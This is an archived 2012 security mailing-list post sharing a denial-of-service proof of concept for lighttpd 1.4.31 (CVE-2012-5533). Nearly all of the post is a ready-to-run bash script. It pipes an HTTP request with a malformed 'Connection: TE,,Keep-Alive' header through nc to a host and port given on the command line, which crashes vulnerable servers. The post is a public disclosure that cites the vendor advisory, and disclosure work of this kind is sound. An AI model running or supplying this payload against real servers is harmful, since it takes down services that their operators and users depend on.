lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20121122104844.3c48ca6c@project-mindstorm.net> Date: Thu, 22 Nov 2012 10:48:44 +0100 From: Milan Berger <m.berger@...ject-mindstorm.net> To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk, submissions@...ketstormsecurity.org Subject: Simple DOS POC lighttpd 1.4.31 Hi, quick and dirty POC for lighttpd 1.4.31 DOS vulnerability. #!/bin/bash # simple lighttpd 1.4.31 DOS POC # CVE-2012-5533 # http://www.lighttpd.net/2012/11/21/1-4-32/ # http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt # written by Milan Berger <t4c@...if.de> if [ $# -lt 2 ] then echo "usage :$0 <Host/IP> <Port>" else echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2 fi -- Kind Regards Milan Berger Project-Mindstorm Technical Engineer https://www.ghcif.de twitter: http://twitter.com/twit4c _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists